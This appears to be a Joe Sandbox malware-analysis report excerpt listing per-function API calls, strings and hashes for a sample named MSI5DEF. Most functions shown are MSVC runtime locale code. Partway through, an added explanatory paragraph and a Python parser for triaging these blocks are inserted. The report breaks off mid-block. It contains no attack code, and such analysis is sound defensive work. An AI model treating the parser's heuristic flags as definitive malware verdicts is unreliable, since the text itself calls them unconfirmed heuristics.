                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B03B1C
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B03B26
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • moneypunct.LIBCPMT ref: 00B03B60
                                                                        • std::_Facet_Register.LIBCPMT ref: 00B03B77
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00B03B97
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: f7b8be8fa312d1e0bfb73981090a08fa03c5708ecc2d8be6ba9bce923666c7ae
                                                                        • Instruction ID: 1a29decb766b1e249d3a085dc3225c71d791baf806de94603c3971f6a4927734
                                                                        • Opcode Fuzzy Hash: f7b8be8fa312d1e0bfb73981090a08fa03c5708ecc2d8be6ba9bce923666c7ae
                                                                        • Instruction Fuzzy Hash: F401D275900A19DBCB01EBA4C9497BEBBF5AF84710F240489F614AB3D2DF349F028B91
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7CB9
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7CC3
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • moneypunct.LIBCPMT ref: 00AF7CFD
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7D14
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7D34
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: 2da5e0ec75f7a73414ec0b08ea48c8bdf170c6f789333494edd84a8888b764c4
                                                                        • Instruction ID: efd728c3193e0741bd355be6a34f91f9a9f424e59ae6dd29b82ecd77ce208686
                                                                        • Opcode Fuzzy Hash: 2da5e0ec75f7a73414ec0b08ea48c8bdf170c6f789333494edd84a8888b764c4
                                                                        • Instruction Fuzzy Hash: 3901C03590461E9BCB01EBE4DA456BE7BA5BF88310F240509FA116B292DF349E028B90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7C24
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7C2E
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • moneypunct.LIBCPMT ref: 00AF7C68
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7C7F
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7C9F
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: 69f8804389be94568c3f2f1af604a535bc188b5e7449cd13debdc52d1a877a75
                                                                        • Instruction ID: 8bf5898dc948c19964bea5982ce02fee9f3228a24ee83d1c16c55e0360590ca9
                                                                        • Opcode Fuzzy Hash: 69f8804389be94568c3f2f1af604a535bc188b5e7449cd13debdc52d1a877a75
                                                                        • Instruction Fuzzy Hash: 1D01D23590461D8BCB11EBB4DA467BE7BB1AF84310F240409F6106B3D2CF349E028B90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7DE3
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7DED
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • moneypunct.LIBCPMT ref: 00AF7E27
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7E3E
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7E5E
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: 5ae6963baa0e9e40bc77d00ea071647ba0845e69acf57a1cde9c70e3a2c2c705
                                                                        • Instruction ID: 69ecbd43b829072794d5f85bc8bd6fd3bf7ccaf4c7c0a5384b4ba82cd9d9f8f8
                                                                        • Opcode Fuzzy Hash: 5ae6963baa0e9e40bc77d00ea071647ba0845e69acf57a1cde9c70e3a2c2c705
                                                                        • Instruction Fuzzy Hash: DD01D23590461D9BCB11EBA4D945ABE7BB1BF88710F24044AF611AB3D2CF349F02DB91
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7D4E
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7D58
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • moneypunct.LIBCPMT ref: 00AF7D92
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7DA9
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7DC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: c8ce8f367ad5793c2e0485709e86a2f77f2fd3f15bae57ac336a128d96802a0a
                                                                        • Instruction ID: c7bfd082f3a6445a2acae00b2ab9ccb5c411b348309e4e2be162edd18c0a3058
                                                                        • Opcode Fuzzy Hash: c8ce8f367ad5793c2e0485709e86a2f77f2fd3f15bae57ac336a128d96802a0a
                                                                        • Instruction Fuzzy Hash: 6F01D235D0061D8BCB01EBA4CA46ABE7BB2BF88310F240009F6106B3D2DF349E029BD1
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(00B44AF8,?,?,00AE2627,00B4571C,00B2CCC0), ref: 00B07835
                                                                        • LeaveCriticalSection.KERNEL32(00B44AF8,?,?,00AE2627,00B4571C,00B2CCC0), ref: 00B07868
                                                                        • RtlWakeAllConditionVariable.NTDLL ref: 00B078DF
                                                                        • SetEvent.KERNEL32(?,00AE2627,00B4571C,00B2CCC0), ref: 00B078E9
                                                                        • ResetEvent.KERNEL32(?,00AE2627,00B4571C,00B2CCC0), ref: 00B078F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                        • String ID:
                                                                        • API String ID: 3916383385-0
                                                                        • Opcode ID: 21d4edc7cb29f1b7b0d48617b75a8ad0b404a788c8d19fc133662df2e27f47c0
                                                                        • Instruction ID: b4d0d34fd60ee257aa7b7eb2f550aede36a23bf9e86834462e043070101bb25a
                                                                        • Opcode Fuzzy Hash: 21d4edc7cb29f1b7b0d48617b75a8ad0b404a788c8d19fc133662df2e27f47c0
                                                                        • Instruction Fuzzy Hash: 34018C39A45620DFCB24AF18FC49BA57BA4FB0A701B05406AE80293370CF716E12DBD4
                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00AE60F4
                                                                        • GetLastError.KERNEL32 ref: 00AE6190
                                                                          • Part of subcall function 00AE1FC0: FindResourceW.KERNEL32(00000000,?,00000006,?,00000000,00B2938D,000000FF,?,80070057,?,?,00000000,00000010,00AE1B09,?), ref: 00AE2040
                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000009,00B3B2DC,00000001,00000000), ref: 00AE614E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryErrorFindLastLibraryLoadResourceSystem
                                                                        • String ID: ntdll.dll
                                                                        • API String ID: 4113295189-2227199552
                                                                        • Opcode ID: cb3f78696dc53843f0841361fb9f7305ebf58cd73796623add54a2bfd926d747
                                                                        • Instruction ID: 2987ba839d3bc36619a4cf9ad1364fc41c1b98741374b828458c955e39edd0cc
                                                                        • Opcode Fuzzy Hash: cb3f78696dc53843f0841361fb9f7305ebf58cd73796623add54a2bfd926d747
                                                                        • Instruction Fuzzy Hash: 1431B071A006489BD720DF69CC45BAEBBF8BF54710F148A1DE429D72D1EBB0A904CB91
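The blocks above are per-function summaries from the Joe Sandbox IDA plugin: the APIs a function calls (entries marked "Part of subcall function" are reached indirectly), the string it references, and hash-style IDs that let identical code at different addresses be matched. Nearly every block in this stretch is MSVC runtime locale-facet code (std::_Lockit, std::_Facet_Register, messages, moneypunct, all in LIBCPMT) that the sample merely links in; the same API String ID (419941038-0, 2750803064-0) recurs at several addresses because the same library helper is compiled in more than once, typically as template instantiations. The block whose String ID is ntdll.dll (GetSystemDirectoryW followed by LoadLibraryExW) is the kind a reviewer looks at first. The parser below is an added example, not part of the report or of Joe Sandbox's own tooling: it reads a constructed excerpt of these blocks, sorts runtime-only functions to the bottom and flags the system-directory load shape. The flag `loads_library_from_system_dir` and the triage ordering are heuristics of mine, not verdicts the report makes.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed excerpt of three per-function blocks, trimmed from the report above
# (a locale-facet helper, a synchronisation helper, the routine referencing ntdll.dll).
SAMPLE = """\
APIs
• __EH_prolog3.LIBCMT ref: 00AF793B
• std::_Lockit::_Lockit.LIBCPMT ref: 00AF7945
  • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
• messages.LIBCPMT ref: 00AF797F
• std::_Facet_Register.LIBCPMT ref: 00AF7996
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
• String ID:
• API String ID: 2750803064-0
APIs
• EnterCriticalSection.KERNEL32(00B44AF8,?,?,00AE2627,00B4571C,00B2CCC0), ref: 00B07835
• RtlWakeAllConditionVariable.NTDLL ref: 00B078DF
• SetEvent.KERNEL32(?,00AE2627,00B4571C,00B2CCC0), ref: 00B078E9
Similarity
• API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
• String ID:
• API String ID: 3916383385-0
APIs
• GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00AE60F4
• GetLastError.KERNEL32 ref: 00AE6190
  • Part of subcall function 00AE1FC0: FindResourceW.KERNEL32(00000000,?,00000006), ref: 00AE2040
• LoadLibraryExW.KERNEL32(?,00000000,00000000,00000009,00B3B2DC,00000001,00000000), ref: 00AE614E
Strings
Similarity
• API ID: DirectoryErrorFindLastLibraryLoadResourceSystem
• String ID: ntdll.dll
• API String ID: 4113295189-2227199552
"""

RUNTIME_MODULES = {"LIBCMT", "LIBCPMT"}  # statically linked MSVC C / C++ runtime

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall function ADDR:"
API_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>[^\s(]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*?)\s*$")
FIELDS = {"API ID": "api_id", "String ID": "string_id", "API String ID": "api_string_id"}

@dataclass
class ApiCall:
    name: str
    module: str
    ref: str
    args: Optional[str]
    indirect: bool  # reached through a subcall, not called by this function itself

@dataclass
class Function:
    apis: List[ApiCall] = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""

def parse_blocks(text: str) -> List[Function]:
    """One Function per 'APIs' block; text before the first block is ignored."""
    fns: List[Function] = []
    cur: Optional[Function] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = Function()
            fns.append(cur)
            continue
        if cur is None:
            continue  # tail of a block that began before the excerpt
        m = API_RE.match(line)  # try the call shape first: "std::..." would also fit FIELD_RE
        if m:
            cur.apis.append(ApiCall(m["name"], m["module"], m["ref"], m["args"], bool(m["sub"])))
            continue
        m = FIELD_RE.match(line)
        if m and m["key"] in FIELDS:
            setattr(cur, FIELDS[m["key"]], m["value"])
    return fns

def is_runtime_only(fn: Function) -> bool:
    """Every direct call goes into the MSVC runtime (EH prologs, locale facets):
    library code the sample links in, so lowest review priority."""
    mods = {a.module for a in fn.apis if not a.indirect}
    return bool(mods) and mods <= RUNTIME_MODULES

def loads_library_from_system_dir(fn: Function) -> bool:
    """Heuristic (an assumption of this example, not a report verdict): the function
    resolves the system directory and also loads a library, like the ntdll.dll block."""
    names = {a.name for a in fn.apis if not a.indirect}
    return "GetSystemDirectoryW" in names and any(n.startswith("LoadLibrary") for n in names)

def triage(fns: List[Function]) -> List[Function]:
    """Review order: OS-API callers that carry a string first, runtime-only blocks last."""
    def score(fn: Function):
        os_calls = sum(1 for a in fn.apis if not a.indirect and a.module not in RUNTIME_MODULES)
        return (0 if is_runtime_only(fn) else 1, 1 if fn.string_id else 0, os_calls)
    return sorted(fns, key=score, reverse=True)

if __name__ == "__main__":
    for fn in triage(parse_blocks(SAMPLE)):
        tag = "runtime" if is_runtime_only(fn) else "os-api"
        flag = " SYSTEMDIR-LOAD" if loads_library_from_system_dir(fn) else ""
        print(f"{fn.apis[0].ref} {tag:7} str={fn.string_id!r} apis={len(fn.apis)}{flag}")
```

Run it against the whole "Similarity" section of a report (copy the text in place of SAMPLE) and the facet blocks collapse to the bottom of the list; grouping the remaining functions by `api_string_id` then shows which os-api blocks are repeats of one another and only need to be read once.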
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AFD2C9
                                                                          • Part of subcall function 00AF6FF9: _Maklocstr.LIBCPMT ref: 00AF7019
                                                                          • Part of subcall function 00AF6FF9: _Maklocstr.LIBCPMT ref: 00AF7036
                                                                          • Part of subcall function 00AF6FF9: _Maklocstr.LIBCPMT ref: 00AF7053
                                                                          • Part of subcall function 00AF6FF9: _Maklocchr.LIBCPMT ref: 00AF7065
                                                                          • Part of subcall function 00AF6FF9: _Maklocchr.LIBCPMT ref: 00AF7078
                                                                        • _Mpunct.LIBCPMT ref: 00AFD356
                                                                        • _Mpunct.LIBCPMT ref: 00AFD370
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                        • String ID: $+xv
                                                                        • API String ID: 2939335142-1686923651
                                                                        • Opcode ID: 96f0a159b258866b5f5c5f24e16f18312891d3921b7c37deb9859bbb04b20f30
                                                                        • Instruction ID: 20a17f55cd7d297c7f16379e9d063ffd1242f65246ddf53862513cdc05f2f469
                                                                        • Opcode Fuzzy Hash: 96f0a159b258866b5f5c5f24e16f18312891d3921b7c37deb9859bbb04b20f30
                                                                        • Instruction Fuzzy Hash: 0E2192B1904B966ED726DFB5849077BBEF8AB0D300B044A5AF199C7A42E734E601CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Mpunct$H_prolog3
                                                                        • String ID: $+xv
                                                                        • API String ID: 4281374311-1686923651
                                                                        • Opcode ID: 2d027a29e0e3f4569bfd55941fe4a5397413f21a1fcdd182de6292aa68c39efe
                                                                        • Instruction ID: ced007346ec22a882cc27a42cab4e2f7de9094420ca3c59c532ed402e4c29f9a
                                                                        • Opcode Fuzzy Hash: 2d027a29e0e3f4569bfd55941fe4a5397413f21a1fcdd182de6292aa68c39efe
                                                                        • Instruction Fuzzy Hash: D521B5B1904B966ED725DF74C49077B7EF8BB0C700F04455AE159C7A41D734E601CB90
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00B0BFC3,00000000,?,00B44EA4,?,?,?,00B0C166,00000004,InitializeCriticalSectionEx,00B2F92C,InitializeCriticalSectionEx), ref: 00B0C01F
                                                                        • GetLastError.KERNEL32(?,00B0BFC3,00000000,?,00B44EA4,?,?,?,00B0C166,00000004,InitializeCriticalSectionEx,00B2F92C,InitializeCriticalSectionEx,00000000,?,00B0BF1D), ref: 00B0C029
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00B0C051
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$ErrorLast
                                                                        • String ID: api-ms-
                                                                        • API String ID: 3177248105-2084034818
                                                                        • Opcode ID: 76dfb2de2921f678ca7560936b258ea8f82f9bfee24e01426757e7707651d202
                                                                        • Instruction ID: 071c2c77ff2141d1be76f28e1e0b901f31ffdfa628a4ce303a21ecf8474fac64
                                                                        • Opcode Fuzzy Hash: 76dfb2de2921f678ca7560936b258ea8f82f9bfee24e01426757e7707651d202
                                                                        • Instruction Fuzzy Hash: DDE01A30280208F7EF201B60EC06B5A3FA99B00B51F204470FA0CE84E0EBA1A892D6C8
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLocal_strcspn
                                                                        • String ID:
                                                                        • API String ID: 2585785616-0
                                                                        • Opcode ID: 7acded27577e603cc539757f10b79217bd226ae4bd3c88c569dfbe77286da03a
                                                                        • Instruction ID: f3d16c8336bc7c4131e7dc987a0f16bcb4c9a978482d495addcb6b0963dd769d
                                                                        • Opcode Fuzzy Hash: 7acded27577e603cc539757f10b79217bd226ae4bd3c88c569dfbe77286da03a
                                                                        • Instruction Fuzzy Hash: CBF13875A00289DFDF14CFA9C984AEEBBF5FF48304F144169E815AB261D731AA45CB60
                                                                        APIs
                                                                        • GetConsoleOutputCP.KERNEL32(1816BA6E,?,00000000,?), ref: 00B273EE
                                                                          • Part of subcall function 00B2002B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00B1C527,?,00000000,-00000008), ref: 00B200D7
                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B27649
                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B27691
                                                                        • GetLastError.KERNEL32 ref: 00B27734
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                        • String ID:
                                                                        • API String ID: 2112829910-0
                                                                        • Opcode ID: b697603f96c31790778e7dae5865e161bc6eb36b58b2812506aeeb5e61b693b7
                                                                        • Instruction ID: a0d87f0187475253d0e5ba1a721fff50cb8ed70d5a56951a42d23b7113065df5
                                                                        • Opcode Fuzzy Hash: b697603f96c31790778e7dae5865e161bc6eb36b58b2812506aeeb5e61b693b7
                                                                        • Instruction Fuzzy Hash: 47D17CB5E046589FCF15CFA8E8809ADBBF4FF09300F1845AAE859E7351DB30A942CB54
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: _strcspn$H_prolog3_ctype
                                                                        • String ID:
                                                                        • API String ID: 838279627-0
                                                                        • Opcode ID: fb0574b2a34db014c636cb2581c4ac580978b216ccf11040f0199f2a3381584e
                                                                        • Instruction ID: 072fa41c4b1c9e9f5bef60e45d15391937d7a7b662e2d5a50c7d03f93b71a011
                                                                        • Opcode Fuzzy Hash: fb0574b2a34db014c636cb2581c4ac580978b216ccf11040f0199f2a3381584e
                                                                        • Instruction Fuzzy Hash: 0AC1447190024D9FDF15DFD8C9849FEBBB9EF48340F24405AFA05AB251DB34AA45CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: _strcspn$H_prolog3_ctype
                                                                        • String ID:
                                                                        • API String ID: 838279627-0
                                                                        • Opcode ID: ee3e39a898dba5b9377efa791c7a8482a5d8cdb0e4a71c6b04dd1bf5cc6df57b
